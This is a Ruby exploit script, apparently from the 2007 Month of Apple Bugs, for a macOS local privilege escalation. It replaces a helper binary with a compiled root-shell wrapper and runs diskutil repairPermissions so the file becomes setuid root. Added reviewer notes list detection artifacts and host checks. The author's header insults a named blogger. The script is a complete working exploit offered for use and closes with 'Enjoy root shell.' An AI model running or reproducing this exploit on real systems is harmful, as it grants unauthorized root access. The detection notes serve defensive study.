# !/usr/bin/ruby
# Exploit for MOAB-15-01-2007
# (c) 2006 LMH .
#
# Note: It's a generic exploit, you can use it over any binary writable which
# is set as root setuid by diskutil repair permissions. Simply change the path.
# Blame Apple for doing such a piece of **** and relying on flawed DAC.
#
# Line-noise: Jackass of the Week
# -------
# On Jan 14, 11:10 pm, "William A. Carrel" wrote:
# > Works for me. I see yesterday's was an HFS+ panic.
# > > Is the info-pull/MoAB/MoKB site down, or is it just me that can't
# > > access it?
# Sorry, my fault. I blocked access to it at this end when they started
# distributing malware so that nobody downloaded anything accidentally. I
# can see it again now.
#
# Kind regards,
#
# Alastair.
# --------
#
# Hmm, false, it was the other way around:
#
# target prot opt source destination
# (...)
# DROP all -- ajhoughton.plus.com anywhere
# (...)
#
# "LMH’s continued propensity for insults, which frankly I don’t particularly
# appreciate." -- http://alastairs-place.net/2007/01/how-childish/
#
# There's nothing wrong about embarrassing you for being an absurd liar.
# Live with it, and then post to your 'blog' as usual. Free Zealot Apple PR (tm).
#
# ---------------------------------------------------------------------------
# Reviewer notes
#
# What the script does, in order:
#   1. selects one of three hard-coded helper binaries under
#      /Applications/Utilities,
#   2. keeps a copy of the original in /tmp,
#   3. compiles a small C program that sets uid/gid/euid to 0 and runs
#      /bin/sh -i,
#   4. moves that program over the selected binary,
#   5. runs `diskutil repairPermissions /`, which (per the author's note above)
#      sets the file at that path root setuid again.
#
# Root cause as described by the author: the target path is writable by the
# invoking user AND the permission repair grants setuid root to whatever file
# sits at that path. Presumably the repair works from the path alone and does
# not check the file's contents -- NOTE(review): inferred from the note above,
# not shown by this code.
#
# Artifacts this code leaves or touches, useful for detection and triage:
#   - /tmp/t.c and /tmp/o (both transient),
#   - /tmp/<basename of the target>, e.g. /tmp/pmTool, which is left behind,
#   - a setuid-root file at one of the AVAILABLE_TARGETS paths whose contents
#     no longer match the vendor-shipped binary,
#   - gcc and `diskutil repairPermissions /` started from a script.
#
# Practical check on a host: ownership and mode of the AVAILABLE_TARGETS paths
# and their parent directories; a setuid-root file should not be replaceable
# by a non-root user.
# ---------------------------------------------------------------------------

require 'fileutils'

# Command that re-applies the recorded permissions on the boot volume.
DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"

# Candidate binaries; the first command-line argument is used as an index
# into this list.
AVAILABLE_TARGETS = [
  "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
  "/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
  "/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
]

# ARGV[0].to_i is 0 when no argument (nil) or a non-numeric string is given,
# so the default is the first entry. An out-of-range index yields nil and
# falls back to the first entry as well; negative values index from the end.
path_to_bin = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])

# The backup lives in /tmp under the target's own file name (predictable path).
path_to_back = File.join("/tmp", File.basename(path_to_bin))

puts "++ Starting: #{path_to_bin}"
puts "++ Back-up: #{path_to_back}"

# Back up the original only when the target exists and no backup is present
# yet, so an existing backup is never overwritten by a later run.
if File.exists?(path_to_bin)
  unless File.exists?(path_to_back)
    FileUtils.cp(path_to_bin, path_to_back)
  end
end

puts "++ Compiling a shell wrapper at /tmp/o..."

# C source of the replacement program: sets uid, gid and euid to 0, then runs
# an interactive /bin/sh. It only has an effect once the file is setuid root.
WRAP_CODE = 'int main() { setuid(0); setgid(0); seteuid(0); system("/bin/sh -i"); }'

# Writes the source to /tmp/t.c, builds /tmp/o with gcc and deletes the source.
# The steps are chained with &&, so /tmp/t.c is removed only after a
# successful build. WRAP_CODE is placed inside single quotes for the shell;
# it contains no single quote itself.
COMPILE = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -rf /tmp/t.c"

# The return value is ignored. If no /tmp/o was produced, the FileUtils.mv
# below raises and the script stops before diskutil is run.
system(COMPILE)

puts "++ Placing backdoor..."

# Replaces the target with the compiled program. This only succeeds when the
# invoking user is allowed to write at the target location -- the precondition
# named in the author's note.
FileUtils.mv("/tmp/o", path_to_bin)

# Runs the permission repair; per the author's note this is the step that
# makes the replaced file root setuid. The result is not checked.
system(DISK_UTIL_COMMAND)

puts "++ Finished. Backup at #{path_to_back}."

# NOTE(review): the backup was made with a plain FileUtils.cp; whether its
# owner and mode bits match the original is not established here. After
# restoring, verify owner, mode and contents against a known-good install.
puts "++ Repair with: mv '#{path_to_back}' '#{path_to_bin}'"
puts "++ Enjoy root shell."